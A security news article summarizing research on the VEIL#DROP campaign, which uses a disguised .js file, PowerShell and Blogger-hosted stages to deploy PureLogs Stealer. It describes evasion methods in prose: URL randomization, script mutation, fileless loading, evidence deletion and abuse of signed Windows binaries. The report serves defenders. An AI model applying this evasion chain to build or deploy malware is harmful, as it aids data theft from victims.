VEIL#DROP: New Multi-Stage Malware Leverages Blogger for Stealthy PureLogs Stealer Delivery
Cybersecurity researchers at **Securonix** have uncovered a sophisticated multi-stage malware delivery campaign dubbed **VEIL#DROP**. This new attack chain exploits social engineering and legitimate **Blogger** pages to deploy **PureLogs Stealer**, a potent information-gathering malware, by blending malicious activity with trusted infrastructure.
A new and highly evasive malware delivery attack chain, **VEIL#DROP**, has been identified by **Securonix**. This campaign leverages social engineering and **Google**'s trusted **Blogger** platform to deliver **PureLogs Stealer**, a .NET-based information stealer.
### Initial Compromise and Evasion Tactics
The infection typically begins with spear-phishing or a drive-by compromise, where users are tricked into executing a deceptively named JavaScript file, such as `transcript.pdf.js`. This file, executed via **Windows Script Host**, launches **PowerShell** with execution policy bypasses enabled.
According to **Akshay Gaikwad**, **Shikha Sangwan**, and **Aaron Beardslee** of **Securonix**, the PowerShell script then retrieves a subsequent payload hosted on a **Blogger** domain (e.g., `htlwub00klocate.blogspot[.]com`). This tactic allows attackers to bypass reputation-based defenses by abusing **Google**'s infrastructure as a staging ground, making the malicious traffic appear legitimate.
### The Role of PureLogs Stealer
The downloaded PowerShell payload initially displays a benign web page, such as **Google**, creating the illusion that a PDF document is opening. Simultaneously, the infection proceeds silently in the background, culminating in the deployment of **PureLogs Stealer**. This infostealer, also known as **PureLog**, is offered under a malware-as-a-service (MaaS) model by the threat actor **PureCoder** and is designed to harvest a wide array of sensitive data from compromised systems.
### Advanced Evasion and Persistence
**VEIL#DROP** exhibits several advanced evasion techniques:
* **Process Termination and Evidence Deletion**: The PowerShell loader attempts to terminate processes like `wscript.exe` and deletes `transcript.pdf.js` to minimize forensic traces.
* **Dynamic Stage Generation**: The malware constructs unique **blogspot[.]com URLs for each execution by inserting a random number of forward slashes. This bypasses static URL signatures and indicator-based blocking.
* **Runtime Mutation and Polymorphism**: The decoded script introduces runtime mutation by replacing placeholder values with randomly generated strings, defeating script signatures and file hashes.
* **Fileless Execution**: The reconstructed script is executed entirely in memory, leaving no artifacts on disk. This involves reflective code loading of a .NET assembly.
* **Living-Off-The-Land (LotL) Binaries**: If direct memory execution fails, the loader leverages trusted **Microsoft**-signed binaries such as `regsvcs.exe`, `installutil.exe`, `msbuild.exe`, and `aspnet_compiler.exe`. This cascade model ensures execution without raising suspicion, as these binaries are legitimate and present on most systems.

### Broader Implications
The impact of a stealer infection extends beyond the initial endpoint. Harvested data can be used for deeper network penetration, lateral movement, establishing persistence, and even breaching cloud infrastructure.
**Securonix** emphasizes that the combination of compromised websites, multi-extension masquerading, trusted cloud services, XOR-obfuscated payloads, reflective .NET loading, fileless execution, and **LOLBIN** (Living Off The Land Binaries) abuse demonstrates a deliberate effort to evade traditional antivirus solutions, minimize forensic artifacts, and maintain operational stealth throughout the infection lifecycle. This sophisticated approach highlights the evolving threat landscape and the need for robust, multi-layered security defenses.